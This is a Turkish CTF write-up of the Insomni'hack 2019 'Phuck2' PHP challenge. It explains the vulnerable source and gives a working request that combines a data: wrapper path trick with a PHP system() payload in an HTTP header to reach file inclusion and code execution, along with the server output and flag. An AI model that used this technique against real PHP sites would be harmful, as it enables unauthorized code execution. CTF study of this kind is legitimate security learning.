date:

Phuck2 – Insomni’hack 2019


Another year, another PH(P)uck. Have fun with that !

http://phuck.teaser.insomnihack.ch/?hl=1

http://phuck.teaser.insomnihack.ch/phpinfo.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
stream_wrapper_unregister('php');
if(isset($_GET['hl'])) highlight_file(__FILE__);

$mkdir = function($dir) {
system('mkdir -- '.escapeshellarg($dir));
};

$randFolder = bin2hex(random_bytes(16));
$mkdir('users/'.$randFolder);
chdir('users/'.$randFolder);

$userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
$userFolder = basename(str_replace(['.','-'],['',''],$userFolder));

$mkdir($userFolder);
chdir($userFolder);
file_put_contents('profile',print_r($_SERVER,true));
chdir('..');

$_GET['page']=str_replace('.','',$_GET['page']);
if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
include($_GET['page']);
}

chdir(__DIR__);
system('rm -rf users/'.$randFolder);

Analiz

Kodun analizi

1
stream_wrapper_unregister('php');

php:// wrapperını kayıtdışı ediyoruz.


1
2
3
$mkdir = function($dir) {
system('mkdir -- '.escapeshellarg($dir));
};

escapeshellarg ifadesini geçemeyeceğimiz için bura ile uğraşmamıza gerek yok


1
2
3
$randFolder = bin2hex(random_bytes(16));
$mkdir('users/'.$randFolder);
chdir('users/'.$randFolder);

Kullanıcıya özel random bir klasör oluşturup dizini değiştiriyor.


1
2
$userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
$userFolder = basename(str_replace(['.','-'],['',''],$userFolder));

X-Forwarded-For headeri set edilmiş ise headerin değerini, edilmemiş ise kullanıncın(bizim) IP adresimizi $userFolder değişkenine atıyor.

$userFolder değişkenindeki değerin varsa noktaları, tire ve boşluk karakterlerini -siliyor- ‘’ ile değiştiriyor. (“127.0.0 .1” -> “127001” gibi)


1
2
3
4
$mkdir($userFolder);
chdir($userFolder);
file_put_contents('profile',print_r($_SERVER,true));
chdir('..');

$userFolder değeri ile klasör açar ve o klasörün içine profile adlı dosyaya $_SERVER arrayinin içeriğini yazar.


1
2
3
4
5
6
7
8
$_GET['page']=str_replace('.','',$_GET['page']);

if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
include($_GET['page']);
}

chdir(__DIR__);
system('rm -rf users/'.$randFolder);

GET ile yolladığımız page değerindeki noktaları siliyor ve file_get_contents($page) ile açtığımız dosyanın içinde stripos ile dosyanın içerisinde <? veya php kelimelerinin geçip geçmediğini kontrol ediyor.

Daha sonra dosyayı siliyor


Phpinfo

Directive Local Value Master Value
allow_url_fopen On On
allow_url_include Off Off

Olduğunu görüyoruz bunun anlamı include içerisinde url ve bazı wrapperler çalışmayacak.

Çözüm


data:,xx/profile diye veri yolladığımız zaman allow_url_fopen ve allow_url_include‘dan dolayı;

1
2
3
# --> döndürdüğü(return) değerini ifade edecek
file_get_contents('data:,xx/profile'); --> string 'xx/profile'
include('data:,xx/profile'); --> 'data:,xx/profile' adına sahip dosyasının içeriği

data wrapperi file_get_contents‘te çalışırken include‘ta çalışmadı.

yani;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx
Get-Flag: <?php system('/get_flag'); ?>
Host: phuck.teaser.insomnihack.ch


HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 20:16:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: User-Agent,Accept-Encoding
Content-Length: 1101
Content-Type: text/html; charset=UTF-8

Array
(
[HTTP_X_FORWARDED_FOR] => data:,xx
[HTTP_GET_FLAG] => INS{PhP_UrL_Phuck3rY_h3h3!}
[HTTP_HOST] => phuck.teaser.insomnihack.ch
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.4.29 (Ubuntu) Server at phuck.teaser.insomnihack.ch Port 80</address>

[SERVER_SOFTWARE] => Apache/2.4.29 (Ubuntu)
[SERVER_NAME] => phuck.teaser.insomnihack.ch
[SERVER_ADDR] => 172.17.0.2
[SERVER_PORT] => 80
[REMOTE_ADDR] => **CENSORED**
[DOCUMENT_ROOT] => /var/www/html/
[REQUEST_SCHEME] => http
[CONTEXT_PREFIX] =>
[CONTEXT_DOCUMENT_ROOT] => /var/www/html/
[SERVER_ADMIN] => [no address given]
[SCRIPT_FILENAME] => /var/www/html/index.php
[REMOTE_PORT] => 42696
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] => page=data:,xx/profile
[REQUEST_URI] => /?page=data:,xx/profile
[SCRIPT_NAME] => /index.php
[PHP_SELF] => /index.php
[REQUEST_TIME_FLOAT] => 1548015373.641
[REQUEST_TIME] => 1548015373
)

Ve flag INS{PhP_UrL_Phuck3rY_h3h3!}


NOT: Soruyu CTF sırasınca çözmüş olmayıp, CTF sornası IRC’den verilen bilgiler (Blaklis tarafından) yardımı ile yazılmıştır


← Prev JS Safe 3.0 - Google CTF | MMORPG3000 - CTFZone 2018 Next →